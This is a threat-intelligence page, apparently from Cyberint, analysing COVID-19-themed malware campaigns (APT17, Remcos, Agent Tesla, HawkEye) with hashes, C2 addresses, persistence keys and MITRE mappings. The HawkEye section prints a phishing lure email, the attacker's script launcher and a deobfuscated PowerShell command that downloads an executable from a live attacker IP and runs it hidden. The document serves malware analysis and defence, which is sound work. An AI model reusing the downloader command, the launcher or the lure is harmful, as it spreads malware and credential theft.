  • T1064 - Scripting (Defense Evasion, Execution)
  • T1060 - Registry Run Keys / Startup Folder (Persistence)
  • T1012 - Query Registry (Discovery)

 

 

APT17 Attacks Kyrgyzstan Officials

Mar. 19, 2020

Cyberint Research discovered an attack supposedly targeting government agencies in Kyrgyzstan. 

The lure document discusses budget discussions with the president of Kyrgyzstan and the country’s Minister of Finance.  

We assess with high confidence that this attack is attributed to the WINNTI (a.k.a. APT-17, China-based threat group).

 

File Name

SHA256

Size

Tags

President discusses budget savings due to coronavirus with Finance Minister.rtf

1527f7b9bdea7752f72ffcd8b0a97e9f05092fed2cb9909a463e5775e12bd2d6

574379 bytes

CVE-2017-11882OLE-Embedded

Lure Document exploits CVE-2017-11882 vulnerability in the Microsoft Equation Editor (EQNEDT32.exe).

Once successfully exploited, the document drops the following files to the %AppData%  directory

File Name

SHA256

File Size

Tags

LBTServ.dll

6ADAED0828D5D2BE09D20091769959B6A66E112B7140E3F03C0D6FCE72B7D07C

139264 bytes

backdoorwinnti

confax.exe

7AADCB53CA413648EBA86D01490038D4C0763BCEB5875ABCEB10DA12D4D6A2DD

54394 bytes

signedtrusted

confax.exe is a legitimately signed binary part of the Logitech BluetoothWizard Host Process. When executes it loads LBTServ.dll to memory and then the malware beacons to the following C2 servers:

Domain

IP Address

Port

Tags

ru.mst.dns-cloud.net

185.206.180.130

301053

C2GR

brands.newst.dnsabr.com

45.76.218.232

301053

C2JP

The C2 servers were down at the time of analysis.

Malware Distributing the Remcos Information Stealer 

Mar. 18, 2020

Malware campaign distributing the Remcos Information Stealer using a malicious macro-enabled malicious excel document detected by Cyberint.

File Name

SHA256

File Size

Tags

(COVID-19) conseils au grand public.xlam

9C764371C5DAE46831D70D615406CB9CE2DE643B8A22FA16404AD1D0F65ADC7D

809472 bytes

CVE-2017-11882

Macro-Enabled

Maldoc

The macro-enabled excel document exploits the CVE-2017-11882 vulnerability - a vulnerability in the Microsoft Equation Editor EQNEDT32.EXE that allows arbitrary remote code execution.

Once successfully exploited, it downloads a file named putty.exe and saves it as vbc.exe under the %AppData% directory

File Name

SHA256

File Size

Tags

vbc.exe

AF1CF572150E95FD75306A13EB3D2306E1E1FB4EF6C238F53F30F2525389E07B

343552 bytes

InfoStealerRemcos

Following that, it executes the malware that drops two files under the %USERPROFILE% \ADyASg directory

  1. a vbs loader - ADyASgAQK.vbs
  2. a copy of the Ramcos Payload - ADyAS.exe

The malware sets persistence under the

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ADyAS

Pointing to the vbs loader, the Remcos malware then spawns Installutil.exe and injects its payload to the InstallUtil.exe process. As a next step, the malware does the following

  1. starts a keylogger to collect user keystrokes
  2. collects browser login information
  3. collects email credentials

Finally, the information gets exfiltrated to an attacker controlled C2 Network.

C2

Port

Tags

185.19.85.141

8855

C2Custom Protocol

 

Malware Distributing the Agent Tesla Information Stealer 

Mar. 18, 2020

A recent malware campaign distributing the well-known Agent Tesla information stealer is using the recent uncertainty around the Coronavirus/COVID-19 pandemic. 

The threat actors in some cases are the ones using .7z files containing the Agentesla payload.

File Name

SHA256

File Size

ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z

51eab875208923d82953fd3492b2efab3dc1d234c555a2db9dcd45e840a9040c

20679 bytes

ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.exe

8a9feda526489531ffb275a88b4c70bf7fe92c7807503c3654cf926ff9bb7d85

73728 bytes

The Agentesla information stealer collects the following information once executed on a victim's machine:

Chrome

Firefox

Internet Explorer

Yandex

Opera

Outlook

Yahoo

Thunderbird

IncrediMail

Eudora

FileZilla

WinSCP

FTP Navigator

Paltalk

Internet Download Manager

JDownloader

Apple keychain

SeaMonkey

Comodo Dragon

CoolNovo

Torch

UC Browser

Flock

TheBat!

PocoMail

FoxMail

Opera Mail

Pidgin

NO-IP

PostBox

WinSCP

CoreFTP

FTPCom

IDM

FlashFXP

WS_FTP

SmartFTP

DynDNS

 

 

Using additional pivots Cyberint Research team was able to discover more samples related to the same campaign.

File Name

SHA256

File Size

FIRST REPORT SANGER COVID-19 03172020.exe

9950271ed3154e6c8fcc70a76b96027c74a4996af6e60e9a13a7d09eff21ef07

73728 bytes

HONNIN.exe

b43448c2ff98abf1cc917734afb72378e1ae209b680e54810219fb2b73689476

53248 bytes

 

COVID-19 Malware Targeting APAC

Mar. 17, 2020

Threat actors have been quick to leverage the global fear and uncertainty that COVID-19 brings and use it to launch and distribute malware campaigns using phishing to gain access to their victims' machines. 

CyberInt research detected a significant spike in COVID-19-related attacks, which will continue to grow as long as the uncertainty around COVID-19 exists. We will continue to provide intelligence and recommendations to be able to act most effectively against cyber threats. The following analysis addresses phishing emails targeting potential victims across South-East Asia.

A recent campaign detected and observed by CyberInt research involves a phishing email targeting the academia sector in South East Asia. The phishing email appears to be sent by the World Health Organization (WHO), containing instructions and guidelines following the COVID-19 outbreak.

Dear Sir,

In view of the recent spread of the 2019- nCoV disease in China and nearby countries, all agents are hereby requested to inform their Master of the Vessels calling at port to follow the below mentioned guidelines issued by Port Health Office,  and send the duly filled documents to the email ids mentioned in the forms 

ADVISORY ON 2019 NOVEL CORONA VIRUS – REG.

INSTRUCTIONS TO SHIP MASTERS BY WHO AND PORT AUTHORITY

  1.   The ship Master are to follow the required documents as per the instructions and submit by email minimum 2-3 days before arrival.
  2.   All ship calling from Chinese Ports are to give temperature report by email for 2 days before arrival or as instructed by email by PHO. The temperature to be measured by Ship designated Medical Officer with Non touch thermometers in small batches only. If the Mercury thermometer is used, to mention temperature taken in Axilla or Oral in your report. Necessary precautions to be taken to sanitize mercury thermometers between measurements.
  3.   All newly joined crew are to be monitored on board for 14 days.
  4.   If they develop any signs & symptoms of 2019-nCoV virus they are to be isolated on board and contact the RMA or nearest Port Health Authority.
  5.   The ship must have stocks of 3 layered surgical masks 30 per crew, hand wash liquid or hand soap 5 per crew, Hand Drying Paper roll for all common wash basins and toilets, 10 PPE kit for Infectious diseases, Bio Hazard Bags 25 pcs for safe disposal of masks, PPE kits.
  6.   To follow the Respiratory and Hand Hygiene. If any sick persons are from shore all the crew are to adviced to maintain 6 feet gap. If they are coughing, they may be given a mask during their work on board and restrict their entry into the ship.
  7.   All shore visitors are to be entertained at the meeting room only.
  8.   To avoid non-essential visitors to the ship.
  9.   To keep record of all the international visitors, owners at Port for survey, audit, repairs or any other activities etc. as per the IHR-2005 2019-nCoV form.
  10.   Keep track of the latest developments on the disease from WHO weblink given above.

11 find attached file of most recent feared contaminated vessell and report to yard authority

 

Best Regards

Ms Monika Kosinska

Program Manager, Governance for Health

Division of Policy and Governance for Health and Well-being

WHO Regional Office for Europe

UN City, Marmorvej 51

DK-2100 Copenhagen, Denmark

Tel.: +45 39 17 1509

Fax: +45 39 17 18 60

E-mail: eurohealthycities@who.int <mailto:eurohealthycities@who.int>

Figure 1 – Email content

The email contains a malicious macro-enabled document - as shown in the table below.

File Name

SHA256

Size

CORONA VIRUS AFFECTED CREW AND VESSEL.xlsm

17161e0ab3907f637c2202a384de67fca49171c79b1b24db7c78a4680637e3d5

55377 bytes

Table 1 – File attachment

Once executed, the document displays a generic lure indicating the cells of the documents are locked, asking the victim to click the "Enable" button. As soon as the victim enables the malicious content, the macro executes and leverages CVE-2017-11882 (a memory corruption vulnerability in the Microsoft equation editor (EQNEDT32.EXE) that is responsible for the inserts and edits of Object Linking and Embedding (OLE) objects). 

The vulnerability allows the attacker to execute remote code in the context of the current user. 

Macro Analysis

Following the successful exploitation, the macro that is embedded as an OLE object is executed and drops two files to the %temp% directory.

File Name

SHA256

Size

y.js

308DE377124F0CB24CE0928E8BFD32AD4A644BA0F804C9B5D9C8D0A2B8E424E1

527 bytes

xx.vbs

223cfde70369bc710918cbc0573ef8381e40af3fb0d8ee6282bfa2a78b9aeaed

9450 bytes

Table 2 – Files list

y.js is executed using the following command line

cmd /c ren %tmp%\yy y.js&cscript %tmp%\y.js

VBS script acts as a launcher that loads and executes an additional VBS script xx.vbs which is the main downloader

var objshell = new ActiveXObject("Wscript.Shell");

var strfolderpath = objshell.ExpandEnvironmentStrings("%temp%");

 

function ChangeFileName()

{

    var fso, f;

    fso = new ActiveXObject("Scripting.FileSystemObject");

    f = fso.GetFile(strfolderpath + "\\" + "xx");

f.name = "xx.vbs";

ChangeFileName();

var r = new ActiveXObject("WScript.Shell").Run("cmd /c cscript " + strfolderpath + "\\" + "xx.vbs");

var rr = new ActiveXObject("Scripting.FileSystemObject");

rr.DeleteFile(strfolderpath + "\\" + "y.js")

xx.vbs is highly obfuscated in an attempt to evade detection and hinder analysis. The script first sets a random-looking variable.

fsdfdsfs = "aHR0cDovLzE5Mi4zLjMxLjIxMi9BTUFOSUNSWVBURUQuZXhl"

yulkytjtrhtjrkdsarjky ="c3ZjaG9zdC5leGU="

The value is a base64 string, the decoded value is a URL

http://192.3.31.212/AMANICRYPTED.exe

svchost.exe

VBS script contains a lot of ‘junk’ code. After setting up variables and the correct file paths the vbs downloader executed the following PowerShell command (deobfuscated)

PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('http://192.3.31.212/AMANICRYPTED.exe','C:\Users\admin\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\admin\AppData\Roaming\svchost.exe'"

The PowerShell command downloads a payload called MANICRYPTED.exe from 192.3.31.212, saves the file in the %AppData% directory as svchost.exe, and executes the payload:

Name

SHA256

Size

svchost.exe

a95ad9e61847bec0e9faac52ac95e069cf6cf9583733cc10cf547060e096eb24

7430 bytes

Table 3 – Payload Execution 

As svchost.exe gets executed, it copies itself as Uopcep.exe under the %AppData%\Awwovi directory and executes itself. The executable is a variant of the known HawkEye malware, HawkEye is a well-known information stealer that collects and exfil browser information and email client information.

Once HawkEye executes, it drops a url shortcut

C:\Users\admin\AppData\Roaming\Awwovi\kherg.url

and modifies the following registry for persistence

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\kherg

The HawkEye malware then spawns the regasm.exe process (Assembly Registration Tool) and injects its payload into the process memory space, the malicious regasm.exe process then checks for internet connectivity by connecting to bot.whatismyipaddress.com to check for the external IP address of the infected system, if successful the malware then connects to mail.novaa-ship.com at SMTP port 587 to exfil the stolen data from the victim machine.

MITRE ATT&CK™ Mapping

Technique Tactic Mapped Behavior
T1059 - Command line Interface Execution EQNEDT32.EXE - Starts cmd.exe for command executioncscript.exe - Starts cmd.exe for command exeution
T1106 - Execution Through API Execution excel.exe - application launched itselfsvchost.exe - starts itself from another location
T1203 - Exploitation for Client Execution Execution EQNEDT32.EXE - Equation Editor starts application (CVE-2017-11882)
T1086 - PowerShell Execution cscript.exe - Executes PowerShell scripts
T1064 - Scripting Defense Evasion, Execution cmd.exe - Executes scriptscscript.exe - Executes PowerShell scriptsregasm.exe - Executes scripts
T1060 - Registry Run Keys / Startup Folder Persistence Uopcep.exe - Changes the autorun value in the registry
T1081 - Credentials in Files
Credential Access
vbc.exe - Actions looks like stealing of personal datavbc.exe - Stealing of credential datavbc.exe - Uses NirSoft utilities to collect credentials
T1012 - Query Registry Discovery Uopcep.exe - Reads Internet Cache Settingscscript.exe - Reads Internet Cache Settingsregasm.exe - Reads Environment valuessvchost.exe - Reads Internet Cache Settings
T1082 - System Information Discovery Discovery regasm.exe - Reads Environment values
T1105 - Remote File Copy
C2, Lateral Movement
PowerShell.exe - Downloads executable files from the Internetcscript.exe - Downloads executable files from the Internet
T1114 - Email Collection Collection vbc.exe - Stealing of credential datavbc.exe - Uses NirSoft utilities to collect credentials
T1071 - Standard Application Layer Protocol C2 regasm.exe - Connects to SMTP port

 

Indicators of Compromise

Name

Type

Indicator

Classification

CORONA VIRUS AFFECTED CREW AND VESSEL.xlsm

Excel File

SHA256 - 17161e0ab3907f637c2202a384de67fca49171c79b1b24db7c78a4680637e3d5SHA256 - ab533d6ca0c2be8860a0f7fbfc7820ffd595edc63e540ff4c5991808da6a257d

DropperExploit

Uopcep.exe

PE

SHA256 - a95ad9e61847bec0e9faac52ac95e069cf6cf9583733cc10cf547060e096eb24

HawkEye

Download IP

IP Address

192.3.31.212

C2Payload Delivery

Download URL

URL

http://192.3.31.212/AMANICRYPTED.exe

C2Payload Delivery

 


Next article